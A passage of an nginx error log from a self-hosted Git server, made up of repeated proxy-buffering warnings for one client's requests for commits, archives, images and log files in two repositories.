216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/64/0000004643 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 13:20:01 [warn] 827#827: *19325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/64/0000004644 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr" -2026/02/15 13:20:47 [warn] 828#828: *19541 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/64/0000004645 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 13:21:46 [warn] 829#829: *19675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/64/0000004646 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 13:21:54 [warn] 829#829: *19742 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/64/0000004647 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:21:56 [warn] 829#829: *19742 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/64/0000004648 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:20 [warn] 832#832: *19807 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/64/0000004649 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.zip", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:26 [warn] 832#832: *19807 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/65/0000004650 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/65/0000004651 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/65/0000004652 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/65/0000004653 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/65/0000004654 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/65/0000004655 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/65/0000004656 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/65/0000004657 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/65/0000004658 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/65/0000004659 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/66/0000004660 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:44 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/66/0000004661 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr" -2026/02/15 13:22:44 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/66/0000004662 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:23:11 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/66/0000004663 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.zip", host: "git.hanmocnn.co.kr" -2026/02/15 13:23:13 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/66/0000004664 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:23:13 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/66/0000004665 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:23:38 [warn] 832#832: *20001 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/66/0000004666 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:23:39 [warn] 832#832: *20001 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/66/0000004667 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:24:57 [warn] 834#834: *20319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/66/0000004668 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 13:24:57 [warn] 834#834: *20319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/66/0000004669 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 13:25:58 [warn] 833#833: *20525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/67/0000004670 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:26:46 [warn] 834#834: *20664 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/67/0000004671 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:26:47 [warn] 834#834: *20664 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/67/0000004672 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:26:51 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/67/0000004673 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:26:57 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/67/0000004674 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 13:26:57 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/67/0000004675 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:20:46 [warn] 831#831: *21229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/67/0000004676 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:22:14 [warn] 827#827: *21306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/67/0000004677 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 14:22:14 [warn] 827#827: *21306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/67/0000004678 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 14:23:21 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/67/0000004679 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:23:22 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/68/0000004680 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 14:23:22 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/68/0000004681 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:23:23 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/68/0000004682 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/68/0000004683 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/68/0000004684 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/68/0000004685 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/68/0000004686 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=800", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/68/0000004687 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/68/0000004688 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/68/0000004689 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:26 [warn] 830#830: *21785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/69/0000004690 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:26 [warn] 830#830: *21785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/69/0000004691 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:45 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/69/0000004692 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:45 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/69/0000004693 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/69/0000004694 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/69/0000004695 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/69/0000004696 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/69/0000004697 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 14:26:47 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/69/0000004698 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:02 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/69/0000004699 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: 